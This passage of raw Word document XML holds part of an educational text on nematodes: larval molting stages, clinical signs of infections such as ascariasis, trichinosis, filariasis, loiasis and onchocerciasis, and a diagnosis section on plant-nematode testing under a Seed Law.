        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>the infective stage for many nematode species. This (</w:t>
      </w:r>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="FE181E"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>L3</w:t>
      </w:r>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">) grows then </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>molts(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="FFB900"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>M3</w:t>
      </w:r>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>) inside the host to an</w:t>
      </w:r>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="FE181E"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>L4</w:t>
      </w:r>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>. This final larval stage grows and undertakes a final molt (</w:t>
      </w:r>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="FFB900"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>M4</w:t>
      </w:r>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>) to an immature</w:t>
      </w:r>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="FE181E"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>adult</w:t>
      </w:r>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>L5</w:t>
      </w:r>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>). These L5's pass through a final growth phase to become sexually mature adult males and females</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="Arial" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="006B3C59">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="Arial" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="Arial" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C65E2" w:rsidRPr="000E2510" w:rsidRDefault="006C65E2" w:rsidP="006B3C59">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t xml:space="preserve">Clinical </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="Arial" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="002060"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>signs</w:t>
      </w:r>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="Arial" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="006B3C59">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="Arial" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="Arial" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C65E2" w:rsidRPr="000E2510" w:rsidRDefault="006C65E2" w:rsidP="006C65E2">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="180"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t>Several clinical signs and symptoms can occur in patients with nematode infections.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C65E2" w:rsidRPr="000E2510" w:rsidRDefault="006C65E2" w:rsidP="006C65E2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>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 xml:space="preserve">Lung invasion - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Löeffler</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Löefflerlike</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> syndrome (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ascariasis</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, hookworm infections, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>strongyloidiasis</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>)</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Fever</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Cough</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Blood-tinged sputum</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C65E2" w:rsidRPr="000E2510" w:rsidRDefault="006C65E2" w:rsidP="006C65E2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>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Intestinal invasion</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May be asymptomatic (small number)</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Abdominal pain (usually vague)</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Abdominal cramps/colic</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C65E2" w:rsidRPr="000E2510" w:rsidRDefault="006C65E2" w:rsidP="006C65E2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>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Muscle and other tissue invasion - Trichinosis</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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Myalgias</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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Fever</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Edema and spasm</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C65E2" w:rsidRPr="000E2510" w:rsidRDefault="006C65E2" w:rsidP="006C65E2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>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 xml:space="preserve">Lymphatic </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>filariasis</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">W </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>bancrofti</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, B </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>malayi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, B </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>timori</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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Inflammatory signs (pain, tenderness, swelling, erythema)</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Lymphadenitis/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>lymphangitis</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="006C65E2" w:rsidRPr="000E2510" w:rsidRDefault="006C65E2" w:rsidP="006C65E2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Orchitis</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="006C65E2" w:rsidRPr="000E2510" w:rsidRDefault="006C65E2" w:rsidP="006C65E2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="150"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Loiasis</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Loa </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>loa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Calabar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> swellings (recurrent subcutaneous inflammation/swelling)</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Eye worm (adults or larvae migrating under conjunctiva)</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Eosinophilia (may exceed 70%)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C65E2" w:rsidRPr="000E2510" w:rsidRDefault="006C65E2" w:rsidP="006C65E2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>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Onchocerciasis -</w:t>
      </w:r>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>O volvulus</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Dermatitis</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C65E2" w:rsidRPr="000E2510" w:rsidRDefault="006C65E2" w:rsidP="006C65E2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="300"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Nodules</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C65E2" w:rsidRPr="000E2510" w:rsidRDefault="006C65E2" w:rsidP="006C65E2">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lastRenderedPageBreak/>
        <w:t>Diagnosis</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C65E2" w:rsidRPr="000E2510" w:rsidRDefault="006C65E2" w:rsidP="006C65E2">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>1.</w:t>
      </w:r>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial" w:hint="cs"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:cs/>
          <w:lang w:bidi="he-IL"/>
        </w:rPr>
        <w:t>‎</w:t>
      </w:r>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Nematological</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> tests are performed on imported and exported plant material, in samples taken by the PPIS inspectors in the ports or at the client’s premises.</w:t>
      </w:r>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial" w:hint="cs"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:cs/>
          <w:lang w:bidi="he-IL"/>
        </w:rPr>
        <w:t>‎</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C65E2" w:rsidRPr="000E2510" w:rsidRDefault="006C65E2" w:rsidP="006B3C59">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:cs/>
          <w:lang w:bidi="he-IL"/>
        </w:rPr>
        <w:t>‎</w:t>
      </w:r>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial" w:hint="cs"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:cs/>
          <w:lang w:bidi="he-IL"/>
        </w:rPr>
        <w:t>‎</w:t>
      </w:r>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t> According to the Seed Law, all nurseries of deciduous fruit-bearing trees, citrus trees, roses, vines and strawberry must be sample-checked for nematodes in order to receive sales permit</w:t>
      </w:r>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="Arial" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="006B3C59">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="Arial" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="Arial" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C65E2" w:rsidRPr="000E2510" w:rsidRDefault="006C65E2" w:rsidP="006B3C59">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="Arial" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="C00000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
